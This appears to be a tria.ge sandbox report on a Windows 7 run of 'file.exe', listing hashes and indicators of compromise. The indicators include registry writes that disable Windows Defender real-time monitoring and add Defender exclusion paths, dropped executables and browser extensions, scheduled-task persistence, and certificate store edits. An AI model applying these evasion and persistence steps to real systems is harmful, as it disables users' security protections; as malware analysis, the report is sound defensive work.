Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
130s -
max time network
135s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
25/09/2022, 15:16
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220901-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
41d606d4333702996c5a6878a9272cac
-
SHA1
40e31b7b91396cc39813a131975ea711c34f7b75
-
SHA256
cbdbdc82c330e09ce4cf89d4ba8f5eadfa61b40b41cdeb332419bf35c642e1f8
-
SHA512
8842d93a9b61788ed086867905e4f985a7f851bef23eaf586a37ee4db160b33d2c9b515ba00dd76b2910514072e7e1e65fa59752ac51b8d5a0772b1dc5991ce8
-
SSDEEP
196608:91OO0y2KXnPWRS+tSqcK9Pwd9PF0sIyQHaywv4RYWHwkYXfI:3OO0JSP8htDcKZyNE5NRYWHwkYvI
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\MNBTbrbBidagOXts = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YnFPtusxCOTU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH = "0" conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\MNBTbrbBidagOXts = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\CXdyuXxQU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\MNBTbrbBidagOXts = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bOFQhydRtxUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bOFQhydRtxUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LCSurMlfClMRC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YnFPtusxCOTU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LCSurMlfClMRC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\MNBTbrbBidagOXts = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\CXdyuXxQU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\RIEoyfpemMjlUPVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\RIEoyfpemMjlUPVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 6 IoCs
flow pid Process 29 1772 rundll32.exe 30 1772 rundll32.exe 31 1772 rundll32.exe 32 1772 rundll32.exe 33 1772 rundll32.exe 35 1772 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 1388 Install.exe 1784 Install.exe 1292 FDybrAg.exe 1124 eyuqRgg.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Control Panel\International\Geo\Nation eyuqRgg.exe -
Loads dropped DLL 12 IoCs
pid Process 1048 file.exe 1388 Install.exe 1388 Install.exe 1388 Install.exe 1388 Install.exe 1784 Install.exe 1784 Install.exe 1784 Install.exe 1772 rundll32.exe 1772 rundll32.exe 1772 rundll32.exe 1772 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json eyuqRgg.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json eyuqRgg.exe -
Drops file in System32 directory 23 IoCs
description ioc Process File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini FDybrAg.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA eyuqRgg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_58589533BD741CABD9C6A1C2A7AAD4A1 eyuqRgg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3 eyuqRgg.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol FDybrAg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat eyuqRgg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA eyuqRgg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_58589533BD741CABD9C6A1C2A7AAD4A1 eyuqRgg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol FDybrAg.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA eyuqRgg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_D29849B2B3CC9118078AA61A670027D9 eyuqRgg.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol eyuqRgg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 eyuqRgg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 eyuqRgg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA eyuqRgg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_D29849B2B3CC9118078AA61A670027D9 eyuqRgg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3 eyuqRgg.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\CXdyuXxQU\eSXxMgy.xml eyuqRgg.exe File created C:\Program Files (x86)\YnFPtusxCOTU2\UQZKBEg.xml eyuqRgg.exe File created C:\Program Files (x86)\LCSurMlfClMRC\wltudTC.dll eyuqRgg.exe File created C:\Program Files (x86)\LCSurMlfClMRC\JmvvNec.xml eyuqRgg.exe File created C:\Program Files (x86)\bOFQhydRtxUn\mNCMcub.dll eyuqRgg.exe File created C:\Program Files (x86)\CXdyuXxQU\AKyMjU.dll eyuqRgg.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi eyuqRgg.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja eyuqRgg.exe File created C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR\eqslCWM.dll eyuqRgg.exe File created C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR\dEuuLNk.xml eyuqRgg.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi eyuqRgg.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak eyuqRgg.exe File created C:\Program Files (x86)\YnFPtusxCOTU2\VAvKoyzMmjDUy.dll eyuqRgg.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\GrrjjXtPjBVPFNmZQ.job schtasks.exe File created C:\Windows\Tasks\ErhcMqZyPKQzNnH.job schtasks.exe File created C:\Windows\Tasks\NSdDFfEujjmGqHjBl.job schtasks.exe File created C:\Windows\Tasks\beNJzxXkYGhzSCmkZn.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1656 schtasks.exe 1120 schtasks.exe 296 schtasks.exe 856 schtasks.exe 1564 schtasks.exe 832 schtasks.exe 1964 schtasks.exe 1700 schtasks.exe 324 schtasks.exe 1968 schtasks.exe 1956 schtasks.exe 1936 schtasks.exe 1884 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3FC8BC12-6529-4CF7-93D5-68187D02130E}\WpadDecision = "0" eyuqRgg.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\76-03-fd-b3-6a-ca\WpadDecisionTime = 40a8eb06f2d0d801 eyuqRgg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing eyuqRgg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs eyuqRgg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\76-03-fd-b3-6a-ca eyuqRgg.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" eyuqRgg.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" eyuqRgg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed eyuqRgg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates eyuqRgg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs eyuqRgg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3FC8BC12-6529-4CF7-93D5-68187D02130E}\76-03-fd-b3-6a-ca eyuqRgg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs eyuqRgg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs eyuqRgg.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\76-03-fd-b3-6a-ca\WpadDetectedUrl rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs eyuqRgg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections eyuqRgg.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" eyuqRgg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs eyuqRgg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs eyuqRgg.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3FC8BC12-6529-4CF7-93D5-68187D02130E}\WpadDecisionTime = 40a8eb06f2d0d801 eyuqRgg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed eyuqRgg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root eyuqRgg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates eyuqRgg.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 eyuqRgg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 eyuqRgg.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" eyuqRgg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates eyuqRgg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs eyuqRgg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust eyuqRgg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates eyuqRgg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f001d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\76-03-fd-b3-6a-ca rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" eyuqRgg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad eyuqRgg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ eyuqRgg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates eyuqRgg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs eyuqRgg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust eyuqRgg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3FC8BC12-6529-4CF7-93D5-68187D02130E} eyuqRgg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs eyuqRgg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3FC8BC12-6529-4CF7-93D5-68187D02130E}\76-03-fd-b3-6a-ca rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs eyuqRgg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs eyuqRgg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs eyuqRgg.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\76-03-fd-b3-6a-ca\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings eyuqRgg.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 eyuqRgg.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f001d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 eyuqRgg.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\76-03-fd-b3-6a-ca\WpadDecision = "0" eyuqRgg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA eyuqRgg.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs eyuqRgg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 eyuqRgg.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde eyuqRgg.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 2032 powershell.EXE 2032 powershell.EXE 2032 powershell.EXE 1156 powershell.EXE 1156 powershell.EXE 1156 powershell.EXE 1732 powershell.EXE 1732 powershell.EXE 1732 powershell.EXE 1492 powershell.EXE 1492 powershell.EXE 1492 powershell.EXE 1124 eyuqRgg.exe 1124 eyuqRgg.exe 1124 eyuqRgg.exe 1124 eyuqRgg.exe 1124 eyuqRgg.exe 1124 eyuqRgg.exe 1124 eyuqRgg.exe 1124 eyuqRgg.exe 1124 eyuqRgg.exe 1124 eyuqRgg.exe 1124 eyuqRgg.exe 1124 eyuqRgg.exe 1124 eyuqRgg.exe 1124 eyuqRgg.exe 1124 eyuqRgg.exe 1124 eyuqRgg.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2032 powershell.EXE Token: SeDebugPrivilege 1156 powershell.EXE Token: SeDebugPrivilege 1732 powershell.EXE Token: SeDebugPrivilege 1492 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
